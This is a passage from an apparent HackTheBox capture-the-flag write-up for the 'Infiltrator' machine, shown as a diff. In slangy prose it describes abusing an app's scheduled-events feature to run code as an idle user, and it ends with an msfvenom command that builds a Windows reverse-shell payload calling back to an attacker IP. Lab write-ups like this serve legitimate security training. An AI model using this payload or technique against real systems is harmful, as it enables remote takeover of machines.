bytebl33d/bytebl33d.github.io/writeups/HackTheBox/Machines/infiltrator.md

 I'm getting random website pop-ups on my desktop every day at 09:00 AM.
 I suspect there's an issue with the app
 ```

-So martinez been cryin in the club (OM chat) like
-> "wahh my desktop opening random websites at 9AM 😭"
+So martinez been cryin in the club (OM chat) like "wahh my desktop opening random websites at 9AM 😭".
 Bro. you fr just told me you got **task scheduler malware edition** installed and running.

 From the application, there is a feature to run programs and open website on a designated time.
 When we try this out and for instance just launch the default browser application, it indeed opens on the local machine.
 Just a spicy lil feature called **"Scheduled Events"**, which basically goes:
 > “hey, wanna open calc.exe on ur coworker's PC at 3am? go for it.”

 I also noticed that Martinez always is in the idle state so maybe we can upload a reverse shell to the DC and execute it in the context of Martinez.
 Let's try!
+Metasploit payload goes brrr...

 ```console
 $ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.7 lport=443 -f exe -o payload.exe